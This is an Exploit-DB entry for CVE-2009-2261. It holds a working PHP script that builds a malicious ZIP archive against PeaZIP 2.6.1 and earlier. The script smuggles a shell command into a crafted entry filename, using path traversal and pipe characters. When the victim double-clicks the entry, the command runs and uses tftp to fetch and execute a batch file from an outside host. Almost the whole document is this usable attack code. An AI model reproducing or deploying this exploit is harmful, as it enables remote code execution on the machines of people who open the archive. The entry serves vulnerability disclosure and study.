PeaZIP <= 2.6.1 Compressed Filename Command Injection Exploit

2009-06-05T00:00:00
ID EDB-ID:8881
Type exploitdb
Reporter Nine:Situations:Group
Modified 2009-06-05T00:00:00

Description

PeaZIP. CVE-2009-2261. Local exploit for windows platform

                                        
                                            <?php
/*
    PeaZIP <= 2.6.1 commpressed filename command injection poc exploit
    by Nine:Situations:Group::pyrokinesis
    site: http://retrogod.altervista.org/
    software site: http://peazip.sourceforge.net/

    tested against: peazip 2.5.1, 2.6.1 for Windows

    a pipe vulnerability exists in the way peazip handles file entries,
    prepare the .zip file, open with it, then double click the compressed text file,
    a cmd shell is launched ...
*/

#change, cannot use slashes or backslashes here
$cmd = "tftp 192.168.0.1 GET pyro pyro.bat & pyro.bat";

class zipfile
{
    var $datasec      = array();
    var $ctrl_dir     = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset   = 0;

	function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

        if ($timearray['year'] < 0x7bc) {
            $timearray['year']    = 0x7bc;
            $timearray['mon']     = 1;
            $timearray['mday']    = 1;
            $timearray['hours']   = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }

        return (($timearray['year'] - 0x7bc) << 0x19) | ($timearray['mon'] << 0x15) | ($timearray['mday'] << 0x10) |
                ($timearray['hours'] << 0xb) | ($timearray['minutes'] << 0x5) | ($timearray['seconds'] >> 0x1);
    }

    function addFile($data, $name, $time = 0)
    {
        $time= (int) $time;
		$name     = str_replace('\\', '/', $name);
        $dtime    = dechex($this->unix2DosTime($time));
        $hexdtime = '\x' . $dtime[6] . $dtime[7]
                  . '\x' . $dtime[4] . $dtime[5]
                  . '\x' . $dtime[2] . $dtime[3]
                  . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');

        $fr   = "\x50\x4b\x03\x04";
        $fr   .= "\x14\x00";            // ver needed to extract
        $fr   .= "\x00\x00";            // gen purpose bit flag
        $fr   .= "\x08\x00";            // compression method
        $fr   .= $hexdtime;             // last mod time and date

        // "local file header" segment
        $unc_len = strlen($data);
        $crc     = crc32($data);
        $zdata   = gzcompress($data);
        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // fix crc bug
        $c_len   = strlen($zdata);
        $fr      .= pack('V', $crc);             // crc32
        $fr      .= pack('V', $c_len);           // compressed filesize
        $fr      .= pack('V', $unc_len);         // uncompressed filesize
        $fr      .= pack('v', strlen($name));    // length of filename
        $fr      .= pack('v', 0);                // extra field length
        $fr      .= $name;

        $fr .= $zdata;
        $this -> datasec[] = $fr;

        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";                // version made by
        $cdrec .= "\x14\x00";                // version needed to extract
        $cdrec .= "\x00\x00";                // gen purpose bit flag
        $cdrec .= "\x08\x00";                // compression method
        $cdrec .= $hexdtime;                 // last mod time & date
        $cdrec .= pack('V', $crc);           // crc32
        $cdrec .= pack('V', $c_len);         // compressed filesize
        $cdrec .= pack('V', $unc_len);       // uncompressed filesize
        $cdrec .= pack('v', strlen($name)); // length of filename
        $cdrec .= pack('v', 0);             // extra field length
        $cdrec .= pack('v', 0);             // file comment length
        $cdrec .= pack('v', 0);             // disk number start
        $cdrec .= pack('v', 0);             // internal file attributes
        $cdrec .= pack('V', 32);            // external file attributes - 'archive' bit set

        $cdrec .= pack('V', $this -> old_offset); // relative offset of local header
        $this -> old_offset += strlen($fr);

        $cdrec .= $name;

        $this -> ctrl_dir[] = $cdrec;
    }

    function file()
    {
        $data    = implode('', $this -> datasec);
        $ctrldir = implode('', $this -> ctrl_dir);

        return
            $data .
            $ctrldir .
            $this -> eof_ctrl_dir .
            pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries "on this disk"
            pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries overall
            pack('V', strlen($ctrldir)) .           // size of central dir
            pack('V', strlen($data)) .              // offset to start of central dir
            "\x00\x00";                             // .zip file comment length
    }

}

$zipfile = new zipfile();
$zipfile -> addFile("lol","../../../../../../../\" README.TXT \" ".str_repeat("\x20",0xde - strlen($cmd))."\" | $cmd | .txt");
$dump_buffer = $zipfile -> file();
assert(file_put_contents("9sg.zip",$dump_buffer));
?>

# milw0rm.com [2009-06-05]